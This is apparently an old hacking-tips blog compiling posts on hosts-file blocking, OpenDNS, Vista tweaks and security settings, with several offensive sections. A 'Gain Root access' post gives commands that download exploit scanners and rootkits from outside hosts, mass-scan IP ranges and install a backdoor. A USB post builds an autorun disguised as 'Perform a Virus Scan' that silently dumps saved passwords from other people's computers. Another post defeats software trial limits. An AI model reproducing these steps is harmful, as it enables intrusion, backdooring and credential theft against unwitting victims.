Sunday, May 3, 2009

How to Block Websites ?

Some times it becomes necessary to block a few websites on our Computers for one or other reason.You can easily and effectivily block access to a website by adding it to your Windows HOSTS file.

1.Go to your HOSTS file which is located at:

C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.

The default Windows HOSTS looks like this:
______________________

# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
_____________________________

3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:

127.0.0.1 name of the URL you want to block

For example to block the MySpace.com homepage (highly recommended!), simply type:

127.0.0.1 myspace.com
127.0.0.1 www.myspace.com

Other parts of MySpace could be blocked in a similar way:

127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
etc etc etc…

You may need to add sites with both with and without the “www.”. Test after blocking to make sure you got it right.

You can add as many sites as you wish to block in this fashion. I, myself, have over 12000 undesireable and dangerous sites in my personal HOSTS file!

4. Close Notepad and answer “Yes” when prompted.

5. Reboot your computer and attempt to access your now blocked website. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”.

—————————–

Some people suggest that you add a website that you wish to block by adding it to Internet Explorer’s Restricted Zone. This does NOT totally block a site. It will only RESTRICT a site from certain actions such as using javascript, Active-X and Java etc.

Some people suggest that your add a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookies.

Password cracker - John the Ripper Installation

Download a source code

Installation can begin by downloading a source code of John the Ripper password cracker. Once we know the link of a file we can use wget:

install_johnripper01.jpg

Extract source files

tar xvzf john-1.7.0.2.tar.gz

Compile a source file

Navigate to:

cd john-1.7.0.2/src

Then we need to rum make command which will return a list of available systems that John the Ripper password cracker can be compiled on.

make

Choose your appropriate architecture, and compile

make linux-x86-any

john the ripper binary

cd ../run/ ls ./john
install_johnripper02.jpg

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one likedjbdns. The easiest options is to useOpenDNS. Just reconfigure your network to use the following DNS servers:

208.67.222.222
208.67.220.220

Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features.After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

Gain Root access in LINUX

First you need a shell witch you will scan for other shells/roots with this scanner: wget http://dalnet.bumerang.ro/linux/xpl/wu2.tar.gz after you download it, start scaning: tar -xzvf wu2.tar.gz unpacking the arhive cd alpyftpd/ ./scan 203 21 180 203 - first IP class 21 - its necesary, its the FTP port, the exploit its for FTP 180 - second IP class wew  rootkit: its a backdoor witch lets you connect to the server throught another port and pass set by you.that makes you invisible, hides screen, ps, w, last and all your procces. wget http://dalnet.bumerang.ro/linux/rk/X.tar.gz tar -xzvf X.tar.gz unpacking the arhive cd X/ ./install root password port e-mail root - its necesary, its the ID password - its set the password you want for root port - the port you connect through on ssh e-mail - your mail to recive the information about the server and your options Example: ./install root dexter 1402 dextervaneza@yahoo.com that means you connect to server on port 1402 with id root and password   ATENTION ::. untuk xpost scanner : liad di bawah ini : wget http://www.cyberborneo.com/tools/xpost.tgz tar -zxvf xpost.tgz cd xpost cd xwurm ./scan 200.152 When scan finished type ./masswu wu-scan.log And if another IP SAY SECCUES u HAVE ROOT ON THIS IP... u must to connect on it with awu if u don't have awu then get it   wget www.geocities.com/blackhat12001/dimi.tgz tar -zxvf dimi.tgz cd awu ./wu -a -d IP ( or box so sayed Succes)   when he coonnect on box type: cd /dev mkdir .p cd .p wget www.geocities.com/blackhat12001/r00tk1t.tgz tar -zxvf r00tk1t.tgz cd shv4 ./setup [password] [port] port mematikan : 53

List of Windows Vista System Files to be Hacked using Resource Hacker


In this tutorial, I’ll tell about various system files in Windows Vista, which can be hacked using Resource Hacker / Resource Tuner to change the look of Windows dialog boxes, menus, login screen, boot screen and many other things.

Of course, now you guys can use Vista Visual Master to do most of these jobs.

So here we start the tutorial:

Approx. all Windows Vista system icons -> %windir%\System32\imageres.dll

Login Screen Background -> %windir%\System32\imageres.dll

Startup ORB animation images -> %windir%\System32\authui.dll

Startup ORB Sound -> %windir%\System32\imageres.dll

Shutdown/ lock, etc. buttons in Startmenu -> %windir%\Explorer.exe -> Bitmap -> 7051 - 7056

Windows Version Image in About Windows dialog box -> %windir%\Branding\Basebrd\basebrd.dll

Windows Version Image in Login Screen bottom -> %windir%\Branding\Basebrd\basebrd.dll

Classic Start button flag and Classic Start menu left side image -> %windir%\Branding\Shellbrd\shellbrd.dll

Control Panerl Left Sidebar Bottom Image -> %windir%\System32\Shell32.dll -> Bitmap -> 632

Back & Forward, Search, Stop, Refresh buttons in Windows Explorer -> %windir%\System32\browseui.dll

Back & Forward, Search, Stop, Refresh, Progress animation, tabs, tab close, etc. buttons in Internet Explorer -> %windir%\System32\ieframe.dll

Welcome Center Images -> %windir%\System32\oobefldr.dll

Boot Screen background image in “No GUI boot” condition -> %windir%\System32\en-US\Winload.exe.mui

Windows Media Player Resources -> %windir%\System32\wmploc.dll

Above are the new system files/locations in Windows Vista which were not present in earlier versions, like XP. But if you want to change look of various dialog boxes like RUN, Progress, System Properies, Startmenu and Taskbar Properties, etc. Then you’ll have to edit the same system files which you used to edit in Windows XP. The difference is, now those files dont contain the resources but their .MUI files do.

So if you want to edit RUN dialog box which was present in “%windir%\System32\Shell32.dll” file in XP, is now present in “%windir%\System32\en-US\Shell32.dll.mui” file in Windows Vista.

So in following list, I’ll tell you where all those files are present in Windows Vista:

All those files are present in any of following 2 locations:

%windir%\en-US\
%windir%\System32\en-US\

All those file names and resource locations are same in XP and Vista.
I hope you guys will like it.

How to secure your Vista PC in 10 easy steps


While Windows Vista may be Microsoft Corp.’s most secure operating system ever, it’s far from completely secure. In its fresh-from-the-box configuration, Vista still leaves a chance for your personal data to leak out to the Web through Windows Firewall or for some nefarious bot to tweak your browser settings without your knowledge.

But by making a few judicious changes using the security tools within Windows Vista — and in some cases by adding a few pieces of free software — you can lock down your operating system like a pro.

1. Use Windows Security Center as a starting point

For a quick overview of your security settings, the Windows Security Center is where you’ll find the status of your system firewall, auto update, malware protection and other security settings. Click Start, Control Panel, Security Center, or you can simply click the shield icon in the task tray. If you see any red or yellow, you are not fully protected.

For example, if you have not yet installed an antivirus product on your machine, or if your current antivirus product is out of date, the malware section of the Security Center should be yellow. Windows does not offer a built-in antivirus utility, so you’ll want to install your own. For free antivirus, I recommend AVG Anti-Virus 8.

2. Use Windows Defender as a diagnostic tool

The malware section of Windows Vista also protects against spyware using Windows Defender. The antispyware protection in your antivirus program usually trumps the protection Microsoft provides, but there are several good reasons to keep Windows Defender enabled. One is that every antispyware program uses a different definition of what is and is not spyware, so redundant protection can actually offer some benefit.

Another reason to keep Windows Defender enabled: diagnostics. Click Tools, and choose Software Explorer from the resulting pane. You can display lists of applications from several categories such as Currently Running Programs, Network Connected Programs and Winsock Service Providers, but Start-up Programs is perhaps the most useful. Click on any name in the left window, and full details will appear in the right pane. By highlighting, you can remove, disable or enable any of the programs listed.

3. Disable the start-up menu

Windows Vista keeps track of all the documents and programs you launch in the start-up menu. This can be convenient for some users, but it can also compromise your privacy if you share a computer within an office or household. Fortunately, Windows Vista provides an easy way to tweak this setting. To protect your privacy, follow these steps:

  • Right-click on the task bar and select “Properties.”
  • Click on the Start Menu tab.
  • Uncheck “Store and display a list of recently opened files.”
  • Uncheck “Store and display a list of recently opened programs.”
  • Click “OK.”

4. Get two-way firewall protection

No desktop should be without a personal firewall, but even if the Security Center says you’re protected, you may not be. The Windows Firewall within Vista blocks all incoming traffic that might be malicious or suspicious — and that’s good. But outbound protection is not enabled by default. That’s a dangerous situation if some new malicious software finds its way onto your PC.

Microsoft did include the tools for Windows Vista to have a true two-way firewall, but finding the setting is a little complicated. (Hint: Don’t go looking the Windows Firewall settings dialog box.

To get two-way firewall protection in Windows Vista, do the following:

  • Click on the Start button; in the search space, type “wf.msc” and press Enter.
  • Click on the Windows Firewall with Advanced Security icon. This management interface displays the inbound and outbound rules.
  • Click on Windows Firewalls Properties. You should now see a dialog box with several tabs.
  • For each profile — Domain, Private and Public — change the setting to Block, and then click OK.

Even if you do this tweak, I recommend adding a more robust third-party firewall. I suggest either Comodo Firewall Pro or ZoneAlarm, both of which are free and fare very well in independent firewall testing.

5. Lock out unwanted guests

If you share your computer with others — and even if you don’t — Windows Vista includes a neat way to keep unwanted guests from guessing your systems administrator password. When you set up users and declare one user as administrator with full privileges, Windows Vista allows outsiders unlimited guesses at the password you chose. Here’s how to limit the guesses.

  • Click Start, then type “Local Security Policy.”
  • Click Account Lockout Policy.
  • Choose Account Lockout Threshold.
  • At the prompt, enter the number of invalid log-ins you’ll accept (say, three).
  • Click OK and close.

6. Now audit your attackers

With the Account Lockout policy in place, you can now enable auditing to see any account attacks. To turn on auditing for failed log-on events, do the following:

  • Click the Start button, type “secpol.msc,” and click the secpol icon.
  • Click on Local Policies and then Audit Policy.
  • Right-click on “Audit account log-on events policy,” and select Properties.
  • Check the Failure box, and click OK.
  • Right-click on “Audit log-on events policy” and select Properties.
  • Check the Failure box and click OK.
  • Close the Local Security Policy window.

You can then use the Event Viewer (by running eventvwr.msc) to view the logs under Windows Logs and Security.

7. Secure your Internet Explorer settings

The Windows Security Center will also report whether your Internet Explorer 7 (or IE 8) security settings are at their recommended levels. If the screen shows this section as red, you can adjust the settings within the browser itself.

  • Within Internet Explorer, click Tools in the menu bar.
  • From the drop-down menu, click Internet Options.
  • Choose the Security tab.
  • Within the Security tab, click Custom Level.

Here you’ll see a window with all the security options for the browser. If any are below the recommended level (if, say, some malware reconfigured your browser settings), these options will be highlighted in red.

To change an individual setting, click the appropriate radio button. To reset them all, use the button near the bottom of the tab. You can also change the overall security setting for Internet Explorer from the default Medium-High setting to the recommended High or Medium, if you wish. Click OK to save and close.

8. Use OpenDNS

Domain Name System (DNS) servers act as a phone book. When you type “pcworld.com” in the address bar, for instance, your browser sends that common-name request to your Internet service provider’s DNS servers to be converted into a series of numbers, or an IP address.

Lately, DNS servers have come under attack, with criminals seeking to redirect common DNS preferences to servers that they control. One way to stop such abuse is to use OpenDNS.

Go to Start, Control Panel, Network and Internet, and then click Network and Sharing Center. Under the tasks listed on the left, click Manage Network Connections. In the Manage Network Connections window, do the following:

  • Right-click on the icon representing your network card.
  • Click Properties.
  • Click Internet Protocol Version 4.
  • Click the Properties button.
  • Select the Use the following DNS server addresses radio button.
  • Type in a primary address of 208.67.222.222.
  • Type in a secondary address of 208.67.220.220.
  • Click OK.

9. Live with User Account Control

One area where some people might want to see the Windows Security Center turn red is User Account Control (UAC), perhaps the most controversial security feature within Windows Vista. Designed to keep rogue remote software from automatically installing (among other things), UAC has a tendency to thwart legitimate software installations by interrupting the process several times with useless messages.

In Windows 7, you’ll be able to set UAC to the level you want. Until then, you do have some options. One is to disable UAC. I would caution against that, since UAC is meant to warn you of potential danger.

Instead, install TweakUAC, a free utility that enables you to turn UAC on or off as well as provides an intermediate “quiet” mode that keeps UAC on but suppresses administration-elevation prompts. With TweakUAC in quiet mode, UAC will appear to be off to those running as administrator accounts, while people with standard user accounts will still be prompted.

10. Check your work

Now that you’ve tweaked Windows Vista, you can keep tabs on your system’s security with the System Health Report. This diagnostic tool takes input from the Performance and Reliability Monitor and turns it into an information-packed report that can spotlight potential security problems.

  • Open Control Panel.
  • Click System.
  • In the Tasks list, click Performance (near the bottom).
  • In the resulting Tasks list, click Advanced tools (near the top).
  • Click the last item on the resulting list — “Generate a system health report.”

The report will list any missing drivers that might be causing error codes, tell you whether your antivirus protection is installed and declare whether UAC is turned on. You may want to run this report once a month just to make sure everything’s still good.

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a Software and run the trial program forever.Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period.Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.

When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.

Brand windows with your name and add your own photo

open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:

[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

1. Save the file as OEMINFO.INI in the c:\windows\system32.

2. Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.

3. Now if you want to display some more information then simply increase the line in the file.

ex: Line4=Your Working Hours Here

You can also add your logo or photo

Create a bmp file(Your Photo) and save it the System32 folder as ?oemlogo.bmp?(Without Quote).

Create Folders And Files With NO Name

This trick will allow you to create files and folders without any name.

Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don?t type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we've had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)

How to Hack Passwords Using USB Drive

There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only theexecutables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC  or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXTfiles.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.